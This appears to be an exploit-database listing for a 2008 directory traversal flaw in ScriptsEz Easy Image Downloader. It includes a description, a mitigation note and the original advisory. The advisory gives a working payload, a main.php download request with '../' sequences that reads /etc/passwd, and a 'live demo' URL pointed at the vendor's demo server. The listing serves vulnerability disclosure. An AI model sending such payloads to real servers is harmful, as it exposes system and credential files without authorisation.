header-logo
Suggest Exploit
vendor:
Easy Image Downloader
by:
JosS
7.5
CVSS
HIGH
Local File Download
22
CWE
Product Name: Easy Image Downloader
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ScriptsEz Easy Image Downloader Local File Download Vulnerability

A vulnerability in ScriptsEz Easy Image Downloader allows an attacker to download arbitrary files from the server. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'main.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to the vulnerable script. This will allow the attacker to download arbitrary files from the server.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered before being used in any filesystem operations.
Source

Exploit-DB raw data:

# ScriptsEz Easy Image Downloader Local File Download Vulnerability
# url: http://www.scriptsez.net/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

PoC:     /main.php?action=download&id=[FILE]
Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd

live demo:
http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd

# milw0rm.com [2008-10-09]

Navigation

Suggest Exploit

Services By CQR